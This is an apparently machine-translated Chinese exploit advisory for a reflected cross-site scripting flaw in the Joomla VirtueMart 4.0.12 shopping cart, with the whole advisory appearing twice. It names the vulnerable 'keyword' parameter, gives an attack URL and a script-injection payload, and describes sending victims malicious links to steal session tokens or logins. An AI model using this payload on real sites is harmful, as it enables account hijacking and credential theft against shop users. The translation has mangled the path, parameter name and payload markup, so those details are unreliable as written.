#利用标题: JOOMLA VIRTUEMART购物车4.0.12-反映XSS
#利用作者:饼干
#日期: 24/07/2023
#vendor: Virtuemart团队
#供应商homepage: https://www.virtuemart.net/
#软件link: https://demo.virtuemart.net/
#JOOMLA扩展Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/shopping-cart/virtuemart/
#版本: 4.0.12
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /产品变化
获取参数“关键字”很容易受到RXSS的影响
https://website/product-variants?关键字=[xss] view=categoryOption=com_virtuemartvirtuemart_category_id=11itemid=925
[XSS有效载荷] : UK9NI'ScriptAlert(1)/scripta6di2
[-] 完毕
#利用作者:饼干
#日期: 24/07/2023
#vendor: Virtuemart团队
#供应商homepage: https://www.virtuemart.net/
#软件link: https://demo.virtuemart.net/
#JOOMLA扩展Link: https://extensions.joomla.org/extension/e-commerce/shopping-cart/shopping-cart/virtuemart/
#版本: 4.0.12
#测试在: Windows 10 Pro
#Impact:操纵网站的内容
## 问候
the_pitbull,raz0r,ins,sadsoul,his0k4,hussin x,sql先生,moizsid09,indoushka
cryptojob(Twitter)twitter.com/0x0cryptojob
## 描述
攻击者可以将电子邮件或即时消息中包含恶意URL的链接发送给受害者
可以执行各种各样的动作,例如窃取受害者的会议令牌或登录凭据
PATH: /产品变化
获取参数“关键字”很容易受到RXSS的影响
https://website/product-variants?关键字=[xss] view=categoryOption=com_virtuemartvirtuemart_category_id=11itemid=925
[XSS有效载荷] : UK9NI'ScriptAlert(1)/scripta6di2
[-] 完毕